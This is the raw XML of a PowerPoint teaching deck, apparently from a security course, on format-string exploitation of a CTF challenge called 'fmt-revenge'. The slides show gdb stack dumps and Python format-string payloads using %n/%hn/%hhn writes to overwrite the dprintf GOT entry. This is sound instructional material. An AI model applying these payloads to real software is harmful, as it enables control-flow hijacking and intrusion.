              <a:t>7fa066ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0008| 0x7ffeb488bd58 --&gt; 0x40057d (&lt;vuln+41&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>    0x400558 &lt;vuln+4&gt;)                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0016| 0x7ffeb488bd60 --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7ffeb488bd7a --&gt; 0x10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7fa066ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0024| 0x7ffeb488bd68 --&gt; 0x40058d (&lt;main+14&gt;:   mov    eax,0x0)                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0032| 0x7ffeb488bd70 --&gt; 0x601018 --&gt; 0x7fa066f3c180 (&lt;__GI___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;: sub    rsp,0xd8)                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0040| 0x7ffeb488bd78 --&gt; 0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7fa066ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>101a --&gt; 0x7d18000000000008                                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0048| 0x7ffeb488bd80 --&gt; 0x1                                                                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0056| 0x7ffeb488bd88 --&gt; 0x7ffeb488be58 --&gt; 0x7ffeb488c2bf ("./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>-revenge") 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C7DA21E-F394-4FEA-BCC2-5195497C06F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2645545" y="716418"/>
            <a:ext cx="224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p = 0x7ffeb488bd7a</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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202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A848AE-C7A3-4580-82A4-0BD939314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05018"/>
            <a:ext cx="12597414" cy="5552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 err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>('%{}c%7$n'.format((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elf.got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>']+2 &gt;&gt; 16) &amp; 0xffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0000| 0x7ffeb488bd50 --&gt; 0x7ffeb488bd60 --&gt; 0x7ffeb488bd7a --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00000060</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0008| 0x7ffeb488bd58 --&gt; 0x40057d (&lt;vuln+41&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>    0x400558 &lt;vuln+4&gt;)                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0016| 0x7ffeb488bd60 --&gt; 0x7ffeb488bd7a --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00000060</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0024| 0x7ffeb488bd68 --&gt; 0x40058d (&lt;main+14&gt;:   mov    eax,0x0)                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0032| 0x7ffeb488bd70 --&gt; 0x601018 --&gt; 0x7fa066f3c180 (&lt;__GI___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>dprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;: sub    rsp,0xd8)                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0040| 0x7ffeb488bd78 --&gt; 0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>101a --&gt; 0x707000007fa066f3                                                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0048| 0x7ffeb488bd80 --&gt; 0x1                                                                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0056| 0x7ffeb488bd88 --&gt; 0x7ffeb488be58 --&gt; 0x7ffeb488c2bf ("./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>-revenge") </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4223995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A848AE-C7A3-4580-82A4-0BD939314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05018"/>
            <a:ext cx="12597414" cy="5552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 err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>('%{}c%10$hhn%{}c%9$hn'.format( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b - a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> ))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0000| 0x7ffeb488bd50 --&gt; 0x7ffeb488bd60 --&gt; 0x7ffeb488bd7a --&gt; 0x1000000000060                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0008| 0x7ffeb488bd58 --&gt; 0x40057d (&lt;vuln+41&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>    0x400558 &lt;vuln+4&gt;)                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0016| 0x7ffeb488bd60 --&gt; 0x7ffeb488bd7a --&gt; 0x1000000000060                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0024| 0x7ffeb488bd68 --&gt; 0x40058d (&lt;main+14&gt;:   mov    eax,0x0)                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0032| 0x7ffeb488bd70 --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x601018 --&gt; 0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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7fa066fe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>138c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (&lt;exec_comm+2508&gt;: mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rax,QWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PTR [rip+0x2e0b15] )    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0040| 0x7ffeb488bd78 --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x60101a --&gt; 0x70700000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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7fa066fe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0048| 0x7ffeb488bd80 --&gt; 0x1                                                                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>0056| 0x7ffeb488bd88 --&gt; 0x7ffeb488be58 --&gt; 0x7ffeb488c2bf ("./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>-revenge") </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3363783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E18AD7-A690-6A44-BFFF-9DB2007F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5FDFF7-43D5-A242-88BB-5873A80FB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sz="4400" dirty="0"/>
              <a:t>Q &amp; A</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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188495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728</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>59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Office 佈景主題</vt:lpstr>
      <vt:lpstr>fmt-revenge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Buffer Overflow</dc:title>
  <dc:creator>Microsoft Office User</dc:creator>
  <cp:lastModifiedBy>yen</cp:lastModifiedBy>
  <cp:revision>170</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-14T10:53:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-26T06:16:17Z</dcterms:modified>
</cp:coreProperties>
</file>